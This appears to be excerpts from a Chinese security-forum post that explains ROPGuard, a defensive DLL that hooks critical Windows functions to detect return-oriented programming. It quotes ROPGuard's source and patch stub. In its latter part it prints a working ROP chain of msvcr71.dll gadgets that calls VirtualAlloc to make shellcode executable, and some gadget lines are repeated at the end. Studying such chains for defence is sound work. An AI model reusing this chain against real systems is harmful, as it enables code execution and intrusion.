class ROPGuard
{
public:
//this code gets called when ROPGuard's dll is injected into a process
ROPGuard() {
//read settings
ReadROPSettings();
//create executable memory cache if needed
if(GetROPSettings()->executableModuleCache) {
InitCacheData();
}
//patch all critical functions
PatchFunctions();
if(GetROPSettings()->showMessageBoxOnLoaded) {
MessageBoxA(NULL, "Successfully loaded ROPGuard dll into target process", "ROPGuard", MB_OK);
}
}
};
//ROPGuard object
ROPGuard h;
…
ret = PatchFunction(guardedFunctions[i].moduleName,
guardedFunctions[i].functionName,
&(guardedFunctions[i].originalAddress),
&(patchcode[patchsizeused]));
if(ret) {
guardedFunctions[i].originalAddress = guardedFunctions[i].originalAddress^ADDR_SCRAMBLE_KEY;
guardedFunctions[i].patchedAddress = (unsigned long)(&(patchcode[patchsizeused]));
patchsizeused += 100;
} else {
guardedFunctions[i].originalAddress = 0;
}
…
SUB ESP, PRESERVE_STACK //抬高栈顶
PUSHAD //保存进入关键函数前的通用寄存器的值
PUSH ESP
PUSH functionAddress //保存经过处理的关键函数地址
CALL ROPCheck //实现各个rop检测功能的入口函数
ADD ESP, PRESERVE_STACK + space taken by PUSHAD //平衡堆栈
jmp patchHeaderEnd //跳到原函数真实入口地址
…
…
关键函数地址 //此时eip被控制,指向这里
0xAABBCCDD //构造的返回地址
Arg1
Arg2
Arg3
Arg4
…
//阶段(0) 配合之后的指令
"\x2e\x40\x34\x7c" //0x7c34402e : # POP EDX # RETN ** [msvcr71.dll]
"\x98\xb1\x38\x7c" //0x7c38b198 ; [edx]可写 edx = 0x7c38b198
"\x13\x40\x37\x7c" //0x7c374013 : # POP EBP # RETN ** [msvcr71.dll] **
"\x98\xb1\x38\x7c" //0x7c38b198 ; [ebp]可读 ebp = 0x7c38b198
//阶段(1) edx<--eax<--esi<--esp,edx准备作为VirtualAlloc的第一个参数
"\x4f\x2f\x37\x7c" //0x7c372f4f : # PUSH ESP # AND AL,10 # MOV DWORD PTR DS:[EDX],ECX # POP ESI # RETN
"\x38\x05\x35\x7c" //0x7c350538 : # MOV EAX,ESI # POP ESI # RETN
"\x00\x00\x00\x00" //0x00000000 : esi = 0
"\xc6\x09\x36\x7c" //0x7c3609c6 : # MOV EDX,EAX
// # SUB EDX,ESI # MOV DWORD PTR DS:[EDX-4],ECX
// # POP EDI # POP ESI # POP EBX
// # RETN
"\x41\x41\x41\x41" //0x41414141 : 占位 edi = 0x41414141
"\x98\xb1\x38\x7c" //0x7c38b198 : [esi]可写 esi = 0x7c38b198
"\x41\x41\x41\x41" //0x41414141 : 占位 ebx = 0x41414141
//(2)ecx<--0x7c34a459
"\x19\xc0\x36\x7c" //0x7c36c019 : # POP ECX # RETN ecx = 0x7c34a459
"\x59\xa4\x34\x7c" //0x7c34a459, # "call VirtualAlloc"
//阶段(3) 布置VirtualAlloc的参数
"\xce\x25\x34\x7c" //0x7c3425ce : # PUSH EDX # OR AL,39 //edx=第一个参数
// # PUSH ECX # OR BYTE PTR SS:[EBP+5],DH # MOV EAX,1
// # RETN ** [msvcr71.dll] ** | {PAGE_EXECUTE_READ}
"\x00\x02\x00\x00" //0x00000200, # dwsize
"\x00\x10\x00\x00" //0x00001000, # flAllocationType
"\x40\x00\x00\x00" //0x00000040, # flProtect
"\x41\x41\x41\x41" //0x41414141, # junk
"\x42\x42\x42\x42" //0x42424242, # junk
"\x30\x5c\x34\x7c"; //0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll] 之后跟shellcode
"\x2e\x40\x34\x7c" //0x7c34402e : # POP EDX # RETN ** [msvcr71.dll]
"\x98\xb1\x38\x7c" //0x7c38b198 ; [edx]可写 edx = 0x7c38b198
"\x13\x40\x37\x7c" //0x7c374013 : # POP EBP # RETN ** [msvcr71.dll] **
"\x98\xb1\x38\x7c" //0x7c38b198 ; [ebp]可读 ebp = 0x7c38b198
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)